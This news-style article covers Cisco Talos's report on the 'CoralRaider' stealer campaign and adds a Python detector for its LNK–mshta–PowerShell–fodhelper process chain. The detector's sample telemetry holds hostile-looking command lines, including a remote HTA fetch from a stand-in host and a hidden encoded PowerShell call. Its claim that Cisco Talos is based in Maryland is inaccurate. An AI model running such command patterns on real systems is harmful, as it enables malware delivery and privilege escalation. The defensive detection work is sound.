Cisco Talos, a cybersecurity technology and information security company based in Maryland, recently uncovered a new cyber threat dubbed “CoralRaider”, believed to originate from Vietnam and to be financially motivated.
Since around 2023, CoralRaider has been targeting individuals across various Asian and Southeast Asian countries including India, Bangladesh, China, Vietnam, South Korea, Indonesia, and others.
To carry out their schemes, CoralRaider employs sophisticated tools like RotBot, a modified version of QuasarRAT, and XClient stealer. Additionally, they utilize a technique called “dead drop,” using legitimate services to conceal their malicious files, along with uncommon programs such as Forfiles.exe and FoDHelper.exe to evade detection.
The attack follows a simple process:
- The user opens a malicious Windows Shortcut file
- The file downloads and executes an HTML application file (HTA) from an attacker-controlled download server
- The HTA activates an embedded Visual Basic script that executes a PowerShell script in memory
- The PowerShell script initiates three others that bypass User Account Control (UAC), perform anti-VM and anti-analysis checks, and disable Windows notifications
- Finally, it downloads and runs RotBot, which loads the XClient stealer.
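The chain above is visible to endpoint telemetry as a sequence of unusual parent/child process relationships: a Windows script host (mshta.exe) launched with a remote URL, PowerShell spawned by that script host, and FoDHelper.exe started by a scripting process rather than by the Windows shell. The following is an added detection example written for this article, not Cisco Talos code; the event format is a constructed Sysmon-style process-creation record, the field names and the list of "expected" parents for fodhelper.exe are assumptions, and the sample events are made up (the URL uses the reserved `.invalid` domain and the encoded command is a placeholder).

```python
"""Process-chain detection for the infection sequence described above:
LNK -> mshta.exe (remote HTA) -> PowerShell -> fodhelper.exe.

Added example, not code from the original report. Event shape and field
names are assumptions modelled on Sysmon Event ID 1 (process creation).
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name, lower-cased by the log loader (assumption)
    cmdline: str


@dataclass
class Finding:
    rule: str
    pid: int
    chain: List[str] = field(default_factory=list)  # image names, root ancestor first


URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Parents from which fodhelper.exe is normally launched (assumption for this example).
EXPECTED_FODHELPER_PARENTS = {"explorer.exe", "svchost.exe"}

# Constructed sample telemetry; not real victim data.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    # the .lnk payload runs the script host against a remote HTA
    ProcEvent(200, 100, "cmd.exe", "cmd.exe /c mshta.exe https://example.invalid/update.hta"),
    ProcEvent(300, 200, "mshta.exe", "mshta.exe https://example.invalid/update.hta"),
    ProcEvent(400, 300, "powershell.exe", "powershell.exe -w hidden -ep bypass -enc BASE64_PLACEHOLDER"),
    ProcEvent(500, 400, "fodhelper.exe", "fodhelper.exe"),
    # benign noise that must not trigger anything
    ProcEvent(600, 100, "notepad.exe", "notepad.exe notes.txt"),
]


def ancestry(pid: int, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Walk parent links and return image names from the oldest known ancestor down to pid.
    A 'seen' set guards against PID reuse producing a cycle in the recorded telemetry."""
    chain, seen = [], set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur.image)
        cur = by_pid.get(cur.ppid)
    return list(reversed(chain))


def detect(events: List[ProcEvent]) -> List[Finding]:
    """Apply one rule per stage of the chain and return every match with its ancestry."""
    by_pid = {e.pid: e for e in events}
    findings: List[Finding] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        parent_image = parent.image if parent else ""
        # Stage 1: script host fetching an HTA from a remote server.
        if e.image == "mshta.exe" and URL_RE.search(e.cmdline):
            findings.append(Finding("mshta_remote_hta", e.pid, ancestry(e.pid, by_pid)))
        # Stage 2: PowerShell spawned directly by the script host.
        if e.image == "powershell.exe" and parent_image == "mshta.exe":
            findings.append(Finding("powershell_from_mshta", e.pid, ancestry(e.pid, by_pid)))
        # Stage 3: fodhelper.exe launched by something other than the shell or a service host.
        if e.image == "fodhelper.exe" and parent_image not in EXPECTED_FODHELPER_PARENTS:
            findings.append(Finding("fodhelper_unusual_parent", e.pid, ancestry(e.pid, by_pid)))
    return findings


def full_chain_alert(findings: List[Finding]) -> bool:
    """True when all three stages fired and the fodhelper process descends from the mshta process,
    i.e. the individual hits belong to one infection chain rather than unrelated activity."""
    rules = {f.rule: f for f in findings}
    needed = {"mshta_remote_hta", "powershell_from_mshta", "fodhelper_unusual_parent"}
    if not needed <= rules.keys():
        return False
    return "mshta.exe" in rules["fodhelper_unusual_parent"].chain


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f.rule, f.pid, " -> ".join(f.chain))
    print("full chain:", full_chain_alert(detect(SAMPLE_EVENTS)))
```

Each stage rule is deliberately loose on its own (mshta.exe with a URL, PowerShell under mshta.exe, fodhelper.exe with an odd parent) and would be noisy as a stand-alone alert; correlating the three through the process tree is what turns them into a high-confidence signal for this particular chain.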
The group uses XClient to steal many types of personal data including social media accounts (including those used for business and advertising), credentials, and financial data. This data is then used for financial gain, including sale to other bad actors.
“We found a few Telegram groups in Vietnamese named ‘Kiếm tiền từ Facebook,’ ‘Mua Bán Scan MINI,’ and ‘Mua Bán Scan Meta,’” Cisco Talos said. “Monitoring these groups revealed that they were underground markets where, among other activities, victim data was traded.”
The discovery of CoralRaider highlights the ever-evolving nature of cyber threats, particularly concerning financial cybercrime. With a focus on stealing sensitive information, this group poses a significant risk to individuals and organizations alike.